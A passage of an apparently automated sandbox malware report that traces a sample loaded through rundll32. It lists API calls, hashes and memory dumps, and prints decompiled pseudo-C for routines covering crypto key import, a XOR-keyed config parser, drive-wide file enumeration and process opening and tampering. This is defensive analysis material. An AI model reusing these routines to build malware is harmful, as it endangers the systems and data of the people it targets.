                                              • Part of subcall function 05810052: StrChrA.SHLWAPI(?,00000020,?,00000000,05806025,00000000,?,00000000,?,?,?,?,?,?), ref: 05810073
                                              • Part of subcall function 05803622: lstrlen.KERNEL32(0580D8E9,00000000,?,?,?,?,0580D8E9,00000035,00000000,?,00000000), ref: 05803652
                                              • Part of subcall function 05803622: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 05803668
                                              • Part of subcall function 05803622: memcpy.NTDLL(00000010,0580D8E9,00000000,?,?,0580D8E9,00000035,00000000), ref: 0580369E
                                              • Part of subcall function 05803622: memcpy.NTDLL(00000010,00000000,00000035,?,?,0580D8E9,00000035), ref: 058036B9
                                              • Part of subcall function 05803622: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 058036D7
                                              • Part of subcall function 05803622: GetLastError.KERNEL32(?,?,0580D8E9,00000035), ref: 058036E1
                                              • Part of subcall function 05803622: HeapFree.KERNEL32(00000000,00000000,?,?,0580D8E9,00000035), ref: 05803704
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                                            • String ID:
                                            • API String ID: 730886825-0
                                            • Opcode ID: 19cdc7d09fa3adb16ca2b2dc2ef675cdb77403396045b51f9a57f9320d51acb1
                                            • Instruction ID: 38b26cced910fa3bc211093ed3f673e0a56e43779ac6aa90827d871baafcbe54
                                            • Opcode Fuzzy Hash: 19cdc7d09fa3adb16ca2b2dc2ef675cdb77403396045b51f9a57f9320d51acb1
                                            • Instruction Fuzzy Hash: EB014831620204BBDB21E79ADD0AF9A7FACEB45610F004455FE05E3190DA70BE408BAA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F427E Relevance: 1.3, APIs: 1, Instructions: 43memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F427E(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E049F4E0B(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x49fa2d8, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E049F6D05(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








                                            0x049f427e
                                            0x049f4286
                                            0x049f429d
                                            0x049f42b8
                                            0x049f42bc
                                            0x049f42c1
                                            0x049f42c3
                                            0x049f42d5
                                            0x049f42e1
                                            0x049f42c5
                                            0x049f42c5
                                            0x049f42ca
                                            0x049f42cf
                                            0x049f42cf
                                            0x049f42c3
                                            0x049f42e7
                                            0x049f42eb
                                            0x049f42eb
                                            0x049f4292
                                            0x049f4297
                                            0x049f429b
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                              • Part of subcall function 049F6D05: SysFreeString.OLEAUT32(00000000), ref: 049F6D68
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,76CDF710,?,00000000,?,00000000,?,049F681F,?,004F0053,04F793D8,00000000,?), ref: 049F42E1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Free$HeapString
                                            • String ID:
                                            • API String ID: 3806048269-0
                                            • Opcode ID: fe1215078044b0066c361e4a42ab073f1170ad7ec6d7666de6a6d8ee9321168d
                                            • Instruction ID: fb7a0a4718ab911bddd2aa1d47d96f824f698cd34113d1992e095592a02113e5
                                            • Opcode Fuzzy Hash: fe1215078044b0066c361e4a42ab073f1170ad7ec6d7666de6a6d8ee9321168d
                                            • Instruction Fuzzy Hash: 6001FB36500619BBDB229F94CC05FEB7B69EF54750F058038FF099A120D731E960EB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F723B Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 75%
                                            			E049F723B(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E049F3072( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E049F4DF6(_a8 + _a8);
					if(_t21 != 0) {
						E049F1908(_a4, _t21, _t23);
					}
					E049F4C73(_a4);
				}
				return _t21;
			}





                                            0x049f7243
                                            0x049f724a
                                            0x049f724c
                                            0x049f725b
                                            0x049f7262
                                            0x049f7271
                                            0x049f7275
                                            0x049f727c
                                            0x049f727c
                                            0x049f7284
                                            0x049f7289
                                            0x049f728e

                                            APIs
                                            • lstrlen.KERNEL32(?,?,?,00000000,?,049F379D,00000000,?,?,?,049F653D,?,04F795B0), ref: 049F724C
                                              • Part of subcall function 049F3072: CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,049F58B7), ref: 049F30AA
                                              • Part of subcall function 049F3072: memcpy.NTDLL(?,049F58B7,00000010,?,?,?,?,?,?,?,?,?,?,049F564C,00000000,049F6D90), ref: 049F30C3
                                              • Part of subcall function 049F3072: CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 049F30EC
                                              • Part of subcall function 049F3072: CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 049F3104
                                              • Part of subcall function 049F3072: memcpy.NTDLL(00000000,049F6D90,049F58B7,0000011F), ref: 049F3156
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                            • String ID:
                                            • API String ID: 894908221-0
                                            • Opcode ID: 58866349eb7167dbedb209c30f9d74912de520efb8af8c647eb671888d2a99a9
                                            • Instruction ID: 15dc2c8a321421ab6df9d0651282f89bc9711b415580adad42e3ed39c00e0d29
                                            • Opcode Fuzzy Hash: 58866349eb7167dbedb209c30f9d74912de520efb8af8c647eb671888d2a99a9
                                            • Instruction Fuzzy Hash: 12F05E76100108BBDF11AE95DC00CDB3FADEFC5264B008032FE19DA110EA32EA659BE0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F3B76 Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F3B76(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E049F3BBE(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E049F78E7(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}




                                            0x049f3b7e
                                            0x049f3b98
                                            0x00000000
                                            0x049f3bb4
                                            0x049f3b8f
                                            0x049f3b96
                                            0x00000000
                                            0x00000000
                                            0x049f3bbb

                                            APIs
                                            • lstrlenW.KERNEL32(?,?,?,049F6FE9,3D049F90,80000002,049F2A82,049F744C,74666F53,4D4C4B48,049F744C,?,3D049F90,80000002,049F2A82,?), ref: 049F3B9B
                                              • Part of subcall function 049F78E7: SysAllocString.OLEAUT32(049F744C), ref: 049F7900
                                              • Part of subcall function 049F78E7: SysFreeString.OLEAUT32(00000000), ref: 049F7941
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: String$AllocFreelstrlen
                                            • String ID:
                                            • API String ID: 3808004451-0
                                            • Opcode ID: 48c984b8630a6cf73e33143e78cff7fba3e968971d79d9c2dcef35223227cc02
                                            • Instruction ID: 95aedec799c1774119b24dc536dc0cd2a1c43cb58ef77f072138ec10cd1e0dc1
                                            • Opcode Fuzzy Hash: 48c984b8630a6cf73e33143e78cff7fba3e968971d79d9c2dcef35223227cc02
                                            • Instruction Fuzzy Hash: AAF0793201020ABFEF129F90EC05EAA3F6AEB18355F048025FE1454160DB36E9B1EBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F6D7F Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F6D7F(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E049F55D3(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E049F4C73(_a4);
				}
				return _t12;
			}





                                            0x049f6d8b
                                            0x049f6d90
                                            0x049f6d94
                                            0x049f6d9b
                                            0x049f6da6
                                            0x049f6daa
                                            0x049f6daa
                                            0x049f6db3

                                            APIs
                                              • Part of subcall function 049F55D3: memcpy.NTDLL(00000000,00000110,?,?,?,?,049F6D90,?,049F58B7,049F58B7,?), ref: 049F5609
                                              • Part of subcall function 049F55D3: memset.NTDLL ref: 049F567F
                                              • Part of subcall function 049F55D3: memset.NTDLL ref: 049F5693
                                            • memcpy.NTDLL(?,049F58B7,00000000,?,049F58B7,049F58B7,?,?,049F58B7,?), ref: 049F6D9B
                                              • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: memcpymemset$FreeHeap
                                            • String ID:
                                            • API String ID: 3053036209-0
                                            • Opcode ID: f5baabf818e55cf08db677d9f53549de5cca9e0683dc86cfcacb622431568ded
                                            • Instruction ID: 446d72f450f48d8958803267051f08f567c28b73218423095540a07c1b15ddb0
                                            • Opcode Fuzzy Hash: f5baabf818e55cf08db677d9f53549de5cca9e0683dc86cfcacb622431568ded
                                            • Instruction Fuzzy Hash: F0E08C338082287BDB122A94DC00EEBBF5D9F956A0F054030FF088A215E621EA2093E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581CC5D Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.NTDLL ref: 0581CC67
                                              • Part of subcall function 05816278: RegOpenKeyExA.KERNEL32(0581CC7F,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,0581CC7F,80000001,?,05816085), ref: 058162BF
                                              • Part of subcall function 05816278: RegOpenKeyExA.ADVAPI32(0581CC7F,0581CC7F,00000000,00020019,80000001,?,0581CC7F,80000001,?,05816085), ref: 058162D5
                                              • Part of subcall function 05816278: RegCloseKey.KERNEL32(80000001,80000001,?,05816085,05816095,?,0581CC7F,80000001,?,05816085), ref: 0581631E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Open$Closememset
                                            • String ID:
                                            • API String ID: 1685373161-0
                                            • Opcode ID: 887940abae79aea46411e19364c5ca154fb75fbdc64aed8402730900f18d6132
                                            • Instruction ID: 937fd355214b7d3860fdb6f724c559d2699d2013da036419866882e86f8c7ab7
                                            • Opcode Fuzzy Hash: 887940abae79aea46411e19364c5ca154fb75fbdc64aed8402730900f18d6132
                                            • Instruction Fuzzy Hash: CBE0EC30240208B7DB00AA59C845FA9776EAB14650F00C025BE489E641EAB1AE60879A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581485E Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,058250E8,0000002C,0580B707,05D78E36,?,00000000,0580A3F0,?,00000318), ref: 05814878
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeVirtual
                                            • String ID:
                                            • API String ID: 1263568516-0
                                            • Opcode ID: e6f6f1f1697a5de673ef498ec4305b67ae4eb10c16e4d207958b42f260aa7996
                                            • Instruction ID: 44ebc01fc791b33e86af7275326eb669c66619ca15502b307f3fcb57e192363d
                                            • Opcode Fuzzy Hash: e6f6f1f1697a5de673ef498ec4305b67ae4eb10c16e4d207958b42f260aa7996
                                            • Instruction Fuzzy Hash: FCD0E231E00229DBCF219BA8D84A99EFB71BB08721B608224E861A71A0CA2059558B94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 05805A14 Relevance: 28.7, APIs: 19, Instructions: 234stringfilesynchronizationCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                              • Part of subcall function 0581294B: ExpandEnvironmentStringsW.KERNEL32(0580AE31,00000000,00000000,00000001,00000000,00000000,?,0580AE31,00000000,?,?,00000000), ref: 05812962
                                              • Part of subcall function 0581294B: ExpandEnvironmentStringsW.KERNEL32(0580AE31,00000000,00000000,00000000), ref: 0581297C
                                            • lstrlenW.KERNEL32(?,00000000,76C869A0,?,00000250,?,00000000), ref: 05805A60
                                            • lstrlenW.KERNEL32(?,?,00000000), ref: 05805A6C
                                            • memset.NTDLL ref: 05805AB4
                                            • FindFirstFileW.KERNEL32(00000000,00000000), ref: 05805ACF
                                            • lstrlenW.KERNEL32(0000002C), ref: 05805B07
                                            • lstrlenW.KERNEL32(?), ref: 05805B0F
                                            • memset.NTDLL ref: 05805B32
                                            • wcscpy.NTDLL ref: 05805B44
                                            • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 05805B6A
                                            • RtlEnterCriticalSection.NTDLL(?), ref: 05805BA0
                                              • Part of subcall function 0580C6B8: HeapFree.KERNEL32(00000000,00000000,05821A9A,00000000), ref: 0580C6C4
                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 05805BBC
                                            • FindNextFileW.KERNEL32(?,00000000), ref: 05805BD5
                                            • WaitForSingleObject.KERNEL32(00000000), ref: 05805BE7
                                            • FindClose.KERNEL32(?), ref: 05805BFC
                                            • FindFirstFileW.KERNEL32(00000000,00000000), ref: 05805C10
                                            • lstrlenW.KERNEL32(0000002C), ref: 05805C32
                                            • FindNextFileW.KERNEL32(?,00000000), ref: 05805CA8
                                            • WaitForSingleObject.KERNEL32(00000000), ref: 05805CBA
                                            • FindClose.KERNEL32(?), ref: 05805CD5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                                            • String ID:
                                            • API String ID: 2962561936-0
                                            • Opcode ID: 7536a4fd30be4094e8e14cb0c630411dc55fd3f6328ebf59bba6fa45ce766c11
                                            • Instruction ID: 8e3d13de2ee83f7c47822fdbc3977eed3035ed4afdaaa9532ddddddb40b8ff75
                                            • Opcode Fuzzy Hash: 7536a4fd30be4094e8e14cb0c630411dc55fd3f6328ebf59bba6fa45ce766c11
                                            • Instruction Fuzzy Hash: E6817F71608305AFD7A0AF25DC88A1BBBE8FF88314F045819FD96D61A1DB74EC448F62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05815830 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 130libraryloadernativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,69B25F44,00000000,?,?,0580335A,?,00000000,?), ref: 05815863
                                            • GetLastError.KERNEL32(?,?,0580335A,?,00000000,?), ref: 05815871
                                            • NtSetInformationProcess.NTDLL ref: 058158CB
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0581590A
                                            • GetProcAddress.KERNEL32(?), ref: 0581592B
                                            • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 05815982
                                            • CloseHandle.KERNEL32(?), ref: 05815998
                                            • CloseHandle.KERNEL32(?), ref: 058159BE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                                            • String ID: v
                                            • API String ID: 3529370251-1801730948
                                            • Opcode ID: 8245a03e5d9233ecb8d668e8f0d82a9f5128e17337e1ea30dc79c245a7e3ce9e
                                            • Instruction ID: f430cb7faf1208b23a79a00bf15e2a49cafde6e9b2793959f28e8d0cdbdce49d
                                            • Opcode Fuzzy Hash: 8245a03e5d9233ecb8d668e8f0d82a9f5128e17337e1ea30dc79c245a7e3ce9e
                                            • Instruction Fuzzy Hash: BA418B71108345AFDB20EF25D849A2BBFE9FBC8318F004929FD96D6160DB7099488F67
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05801E50 Relevance: 18.5, APIs: 12, Instructions: 519memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 05801E88
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 05801EBA
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 05801EEC
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 05801F1E
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 05801F50
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 05801F82
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 05801FB4
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 05801FE6
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 05802018
                                            • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 058021AB
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,?,?,?), ref: 0580224F
                                              • Part of subcall function 0581A2FF: RtlAllocateHeap.NTDLL ref: 0581A340
                                              • Part of subcall function 0581A2FF: memset.NTDLL ref: 0581A354
                                              • Part of subcall function 0581A2FF: GetCurrentThreadId.KERNEL32 ref: 0581A3E1
                                              • Part of subcall function 0581A2FF: GetCurrentThread.KERNEL32 ref: 0581A3F4
                                              • Part of subcall function 0580CDBF: RtlEnterCriticalSection.NTDLL(05D7C2D0), ref: 0580CDC8
                                              • Part of subcall function 0580CDBF: HeapFree.KERNEL32(00000000,?), ref: 0580CDFA
                                              • Part of subcall function 0580CDBF: RtlLeaveCriticalSection.NTDLL(05D7C2D0), ref: 0580CE18
                                            • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 058021F7
                                              • Part of subcall function 05803997: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0581780A,?), ref: 058039A0
                                              • Part of subcall function 05803997: memcpy.NTDLL(00000000,?,00000000,?), ref: 058039C3
                                              • Part of subcall function 05803997: memset.NTDLL ref: 058039D2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$CriticalCurrentSectionThreadmemset$AllocateEnterLeavelstrlenmemcpy
                                            • String ID:
                                            • API String ID: 3296958911-0
                                            • Opcode ID: cb0e39f678f8567584d371bfbe47e2b57e6e0d16d73476a93db6a3c70dc166cb
                                            • Instruction ID: 9e3138ff8555976af1dffc42edc6ee42f7cd99b79d405015dcbf68b5d7944ce6
                                            • Opcode Fuzzy Hash: cb0e39f678f8567584d371bfbe47e2b57e6e0d16d73476a93db6a3c70dc166cb
                                            • Instruction Fuzzy Hash: 9CF1D379B24215AF9BA0FBBACC8DA6F6BDD6B482107159820FC03D7280DE74ED41C755
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580591B Relevance: 16.6, APIs: 11, Instructions: 94memorystringsynchronizationCOMMON
                                            Download Yara Rule
                                            APIs
                                            • wcscpy.NTDLL ref: 0580594F
                                            • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 0580595B
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0580596C
                                            • memset.NTDLL ref: 05805989
                                            • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 05805997
                                            • WaitForSingleObject.KERNEL32(00000000), ref: 058059A5
                                            • GetDriveTypeW.KERNEL32(?), ref: 058059B3
                                            • lstrlenW.KERNEL32(?), ref: 058059BF
                                            • wcscpy.NTDLL ref: 058059D1
                                            • lstrlenW.KERNEL32(?), ref: 058059EB
                                            • HeapFree.KERNEL32(00000000,?), ref: 05805A04
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                                            • String ID:
                                            • API String ID: 3888849384-0
                                            • Opcode ID: e2ee2981d8b29f320d083734b7c4a8a16c1d2ffced19f9593194a8d3337c5b2e
                                            • Instruction ID: aa27f3c51a918d956b6ad16d040b9e03c8a6779b2ce5daf431ccef70c9b6aa34
                                            • Opcode Fuzzy Hash: e2ee2981d8b29f320d083734b7c4a8a16c1d2ffced19f9593194a8d3337c5b2e
                                            • Instruction Fuzzy Hash: C2312C7291010CBFDF51ABA4EC89CEE7FBDEB08324B108456F905E2160DB35AE458F61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F475F Relevance: 12.3, APIs: 8, Instructions: 258memoryCOMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 93%
                                            			E049F475F(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t115;
				void* _t118;
				intOrPtr _t121;

				_t118 = __esi;
				_t115 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x49fa344; // 0x69b25f44
				if(E049F4556( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x49fa378 = _v8;
				}
				_t33 =  *0x49fa344; // 0x69b25f44
				if(E049F4556( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x49fa344; // 0x69b25f44
				_push(_t115);
				if(E049F4556( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x49fa2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x49fa344; // 0x69b25f44
						_t45 = E049F296E(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t118);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x49fa2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x49fa344; // 0x69b25f44
						_t46 = E049F296E(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x49fa2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x49fa344; // 0x69b25f44
						_t47 = E049F296E(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x49fa2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x49fa344; // 0x69b25f44
						_t48 = E049F296E(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x49fa004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x49fa344; // 0x69b25f44
						_t49 = E049F296E(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x49fa02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x49fa344; // 0x69b25f44
						_t50 = E049F296E(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x49fa2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x49fa344; // 0x69b25f44
								_t51 = E049F296E(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E049F3A24(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E049F3F7E();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x49fa344; // 0x69b25f44
